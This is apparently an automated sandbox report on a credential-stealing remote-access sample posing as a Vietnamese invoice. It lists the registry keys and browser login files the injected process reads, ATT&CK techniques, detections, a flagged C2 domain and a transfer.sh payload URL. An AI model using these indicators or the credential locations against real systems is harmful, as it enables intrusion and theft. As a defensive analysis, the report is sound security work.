              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 4884, type: MEMORYSTR
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
              Source: Yara matchFile source: 17.2.dwn.exe.4c7ab10.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.2.dwn.exe.4c7ab10.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.2.dwn.exe.481aab0.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.2.dwn.exe.47caa90.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000011.00000002.590461155.0000000004C7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.568348321.0000000004661000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.37c86a0.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36b0640.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.3728680.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe.36d8660.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000C.00000000.351505282.0000000000456000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.358493957.00000000037C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.520253260.0000000001307000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.357319262.0000000003630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.357530014.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.355401113.00000000025D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe PID: 3988, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 3660, type: MEMORYSTR
              Source: Yara matchFile source: 17.2.dwn.exe.4c7ab10.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.2.dwn.exe.4c7ab10.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.2.dwn.exe.481aab0.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 17.2.dwn.exe.47caa90.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000011.00000002.590461155.0000000004C7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.568348321.0000000004661000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts1
              Native API
              1
              Registry Run Keys / Startup Folder
              412
              Process Injection
              1
              Disable or Modify Tools
              1
              OS Credential Dumping
              1
              System Time Discovery
              Remote Services11
              Archive Collected Data
              Exfiltration Over Other Network Medium1
              Ingress Tool Transfer
              Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default Accounts1
              Shared Modules
              Boot or Logon Initialization Scripts1
              Registry Run Keys / Startup Folder
              11
              Deobfuscate/Decode Files or Information
              1
              Input Capture
              2
              File and Directory Discovery
              Remote Desktop Protocol1
              Data from Local System
              Exfiltration Over Bluetooth11
              Encrypted Channel
              Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain Accounts1
              PowerShell
              Logon Script (Windows)Logon Script (Windows)2
              Obfuscated Files or Information
              1
              Credentials in Registry
              28
              System Information Discovery
              SMB/Windows Admin Shares1
              Email Collection
              Automated Exfiltration1
              Non-Standard Port
              Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
              Software Packing
              1
              Credentials In Files
              31
              Security Software Discovery
              Distributed Component Object Model1
              Input Capture
              Scheduled Transfer2
              Non-Application Layer Protocol
              SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
              Timestomp
              LSA Secrets21
              Virtualization/Sandbox Evasion
              SSH1
              Clipboard Data
              Data Transfer Size Limits113
              Application Layer Protocol
              Manipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.common1
              Masquerading
              Cached Domain Credentials4
              Process Discovery
              VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup Items21
              Virtualization/Sandbox Evasion
              DCSync1
              Application Window Discovery
              Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job412
              Process Injection
              Proc Filesystem1
              Remote System Discovery
              Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
              System Network Configuration Discovery
              Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 778240 Sample: Y#U00eau c#U1ea7u b#U00e1o ... Startdate: 05/01/2023 Architecture: WINDOWS Score: 100 56 208.168.6.0.in-addr.arpa 2->56 58 ip-api.com 2->58 60 icanhazip.com 2->60 76 Multi AV Scanner detection for domain / URL 2->76 78 Malicious sample detected (through community Yara rule) 2->78 80 Antivirus detection for URL or domain 2->80 82 12 other signatures 2->82 8 Y#U00eau c#U1ea7u b#U00e1o gi#U00e1  INV20230104-VN.exe 16 7 2->8         started        13 Shhejayly.exe 2->13         started        15 Shhejayly.exe 2->15         started        signatures3 process4 dnsIp5 62 onedrive.live.com 8->62 70 2 other IPs or domains 8->70 40 C:\Users\user\AppData\...\Shhejayly.exe, PE32 8->40 dropped 42 C:\Users\...\Shhejayly.exe:Zone.Identifier, ASCII 8->42 dropped 44 Y#U00eau c#U1ea7u ...20230104-VN.exe.log, ASCII 8->44 dropped 96 Encrypted powershell cmdline option found 8->96 98 Writes to foreign memory regions 8->98 100 Injects a PE file into a foreign processes 8->100 17 aspnet_compiler.exe 2 18 8->17         started        22 powershell.exe 12 8->22         started        64 l-0003.l-dc-msedge.net 13.107.43.12, 443, 49706 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 13->64 66 onedrive.live.com 13->66 72 2 other IPs or domains 13->72 102 Machine Learning detection for dropped file 13->102 68 onedrive.live.com 15->68 74 2 other IPs or domains 15->74 file6 signatures7 process8 dnsIp9 46 obologs.work.gd 194.5.98.244, 4044, 49699, 49700 DANILENKODE Netherlands 17->46 48 transfer.sh 144.76.136.153, 443, 49703, 49704 HETZNER-ASDE Germany 17->48 50 geoplugin.net 178.237.33.50, 49702, 80 ATOM86-ASATOM86NL Netherlands 17->50 36 C:\Users\user\AppData\Local\Temp\dwn.exe, PE32 17->36 dropped 38 C:\Users\user\AppData\...\Cuhcxlcg[1].exe, PE32 17->38 dropped 84 Maps a DLL or memory area into another process 17->84 86 Sample uses process hollowing technique 17->86 24 aspnet_compiler.exe 1 17->24         started        27 aspnet_compiler.exe 17->27         started        29 aspnet_compiler.exe 17->29         started        33 23 other processes 17->33 31 conhost.exe 22->31         started        file10 signatures11 process12 dnsIp13 88 Tries to steal Instant Messenger accounts or passwords 24->88 90 Tries to steal Mail credentials (via file / registry access) 24->90 52 192.168.2.1 unknown unknown 33->52 54 transfer.sh 33->54 92 Machine Learning detection for dropped file 33->92 94 Tries to harvest and steal browser information (history, passwords, etc) 33->94 signatures14

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe28%ReversingLabsByteCode-MSIL.Downloader.Seraph
              Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe31%VirustotalBrowse
              Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe100%Joe Sandbox ML
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\dwn.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\Cuhcxlcg[1].exe100%Joe Sandbox ML
              C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe100%Joe Sandbox ML
              SourceDetectionScannerLabelLinkDownload
              16.2.aspnet_compiler.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              15.0.aspnet_compiler.exe.400000.0.unpack100%AviraHEUR/AGEN.1244765Download File
              14.2.aspnet_compiler.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              15.2.aspnet_compiler.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              12.0.aspnet_compiler.exe.400000.0.unpack100%AviraBDS/Backdoor.GenDownload File
              SourceDetectionScannerLabelLink
              l-0003.l-dc-msedge.net0%VirustotalBrowse
              geoplugin.net0%VirustotalBrowse
              obologs.work.gd14%VirustotalBrowse
              SourceDetectionScannerLabelLink
              http://www.imvu.comr0%URL Reputationsafe
              http://crl.microsoft0%URL Reputationsafe
              https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
              http://www.sajatypeworks.com0%URL Reputationsafe
              http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
              http://geoplugin.net/json.gp/C0%URL Reputationsafe
              http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
              http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
              http://www.urwpp.deDPlease0%URL Reputationsafe
              http://www.zhongyicts.com.cn0%URL Reputationsafe
              http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
              https://pki.goog/repository/00%URL Reputationsafe
              http://www.carterandcone.coml0%URL Reputationsafe
              http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
              http://pki.goog/gsr2/GTSGIAG3.crt0)0%URL Reputationsafe
              http://pki.goog/gsr2/GTS1O1.crt0#0%URL Reputationsafe
              http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
              http://www.nirsoft.net-ms-win-core-delayload-l1-1-0.dll.dlldll0%URL Reputationsafe
              https://aefd.nelreports.net/api/report?cat=bingth0%URL Reputationsafe
              http://www.tiro.com0%URL Reputationsafe
              http://www.goodfont.co.kr0%URL Reputationsafe
              https://kpf0yw.am.files.1drv.com45kT0%Avira URL Cloudsafe
              obologs.work.gd100%Avira URL Cloudphishing
              http://crl.globals0%Avira URL Cloudsafe
              http://www.nirsoft.net-ms-win-core-delayload-l1-1-0.dll.dlldllD0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              l-0003.l-dc-msedge.net
              13.107.43.12
              truefalseunknown
              geoplugin.net
              178.237.33.50
              truefalseunknown
              ip-api.com
              208.95.112.1
              truefalse
                high
                obologs.work.gd
                194.5.98.244
                truetrueunknown
                transfer.sh
                144.76.136.153
                truefalse
                  high
                  icanhazip.com
                  104.18.114.97
                  truefalse
                    high
                    kpf0yw.am.files.1drv.com
                    unknown
                    unknownfalse
                      high
                      onedrive.live.com
                      unknown
                      unknownfalse
                        high
                        208.168.6.0.in-addr.arpa
                        unknown
                        unknowntrue
                          unknown
                          NameMaliciousAntivirus DetectionReputation
                          obologs.work.gdtrue
                          • Avira URL Cloud: phishing
                          unknown
                          https://transfer.sh/get/J59PTO/Cuhcxlcg.exefalse
                            high
                            NameSourceMaliciousAntivirus DetectionReputation
                            http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplatebhv8995.tmp.39.drfalse
                              high
                              https://www.google.com/chrome/static/images/folder-applications.svgbhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drfalse
                                high
                                http://www.imvu.comraspnet_compiler.exe, 00000010.00000002.374522754.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://www.google.com/chrome/static/css/main.v2.min.cssbhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drfalse
                                  high
                                  http://crl.microsoftaspnet_compiler.exe, 0000000C.00000003.477736669.0000000004001000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://www.google.com/chrome/static/images/fallback/google-chrome-logo.jpgbhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drfalse
                                    high
                                    http://www.msn.combhv8995.tmp.39.drfalse
                                      high
                                      http://www.fontbureau.com/designersY#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.nirsoft.netaspnet_compiler.exe, 0000000E.00000002.397869869.00000000008F4000.00000004.00000010.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000002.477360003.0000000000FB4000.00000004.00000010.00020000.00000000.sdmp, aspnet_compiler.exe, 00000027.00000002.502161495.00000000008F4000.00000004.00000010.00020000.00000000.sdmp, aspnet_compiler.exe, 0000002A.00000002.513031021.00000000001B3000.00000004.00000010.00020000.00000000.sdmpfalse
                                          high
                                          https://deff.nelreports.net/api/report?cat=msnbhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drfalse
                                          • URL Reputation: safe
                                          unknown
                                          https://www.google.com/chrome/static/images/chrome-logo.svgbhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drfalse
                                            high
                                            https://www.google.com/chrome/static/images/homepage/homepage_features.pngbhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drfalse
                                              high
                                              https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=aspnet_compiler.exe, 0000000E.00000003.386957585.0000000002743000.00000004.00000800.00020000.00000000.sdmp, bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drfalse
                                                high
                                                https://www.google.com/chrome/static/images/download-browser/big_pixel_phone.pngbhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drfalse
                                                  high
                                                  http://www.sajatypeworks.comY#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://www.google.com/chrome/bhv8995.tmp.39.drfalse
                                                    high
                                                    https://www.google.comaspnet_compiler.exe, 00000010.00000002.374522754.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                      high
                                                      http://www.founder.com.cn/cn/cTheY#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0fbhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drfalse
                                                        high
                                                        https://www.google.com/chrome/static/images/homepage/hero-anim-bottom-left.pngbhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drfalse
                                                          high
                                                          https://www.google.com/chrome/static/images/chrome_safari-behavior.jpgbhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drfalse
                                                            high
                                                            http://geoplugin.net/json.gp/CY#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.358493957.00000000037C8000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.357530014.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.357319262.0000000003630000.00000004.00000800.00020000.00000000.sdmp, Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.355401113.00000000025D4000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000000.351505282.0000000000456000.00000040.00000400.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://maps.windows.com/windows-app-web-linkbhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drfalse
                                                              high
                                                              http://www.msn.com/?ocid=iehpaspnet_compiler.exe, 0000000E.00000003.388842971.0000000002746000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000E.00000003.386957585.0000000002743000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000013.00000003.401780181.0000000002A83000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000013.00000003.405195939.0000000002A86000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000001D.00000003.436504638.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000001D.00000003.433788536.00000000028D3000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000003.463221264.0000000003003000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000003.466714622.0000000003006000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000027.00000003.487705843.00000000028A6000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000027.00000003.481529759.00000000028A3000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000002A.00000003.504317340.0000000000A46000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000002A.00000003.500729020.0000000000A43000.00000004.00000800.00020000.00000000.sdmp, bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drfalse
                                                                high
                                                                https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=68568119166aspnet_compiler.exe, 0000000E.00000003.386957585.0000000002743000.00000004.00000800.00020000.00000000.sdmp, bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drfalse
                                                                  high
                                                                  https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.drfalse
                                                                    high
                                                                    https://srtb.msn.com/auction?a=de-ch&b=a8415ac9f9644a1396bc1648a4599445&c=MSN&d=http%3A%2F%2Fwww.msnbhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drfalse
                                                                      high
                                                                      http://crl.pki.goog/GTS1O1core.crl0bhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://www.galapagosdesign.com/DPleaseY#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://www.google.com/chrome/static/images/icon-announcement.svgbhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drfalse
                                                                        high
                                                                        https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://caspnet_compiler.exe, 0000000E.00000003.389075530.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000E.00000003.386841625.000000000274F000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000013.00000003.401748327.0000000002A96000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000001D.00000003.433671270.00000000028E6000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000021.00000003.463192812.0000000003016000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000027.00000003.481477826.00000000028B6000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000002A.00000003.500671413.0000000000A56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://www.urwpp.deDPleaseY#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://www.nirsoft.net/aspnet_compiler.exe, 00000010.00000002.374522754.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                            high
                                                                            http://www.zhongyicts.com.cnY#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.360191656.00000000065F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameY#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe, 00000000.00000002.354759645.00000000024F1000.00000004.00000800.00020000.00000000.sdmp, dwn.exe, 00000011.00000002.538650865.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 00000012.00000002.537970433.000000000250C000.00000004.00000800.00020000.00000000.sdmp, Shhejayly.exe, 0000001C.00000002.537475545.00000000024E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://www.google.com/chrome/static/images/homepage/hero-anim-middle.pngbhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drfalse
                                                                                high
                                                                                http://crl.globalsaspnet_compiler.exe, 0000000C.00000003.360263482.0000000003E57000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000000C.00000003.357358743.0000000003E51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://www.google.com/chrome/static/css/main.v3.min.cssbhv610E.tmp.33.dr, bhv9EB4.tmp.42.dr, bhv107D.tmp.19.dr, bhvF833.tmp.14.dr, bhv8995.tmp.39.drfalse
                                                                                  high
                                                                                  https://www.google.com/chrome/application/x-msdownloadC:bhvF833.tmp.14.drfalse
                                                                                    high
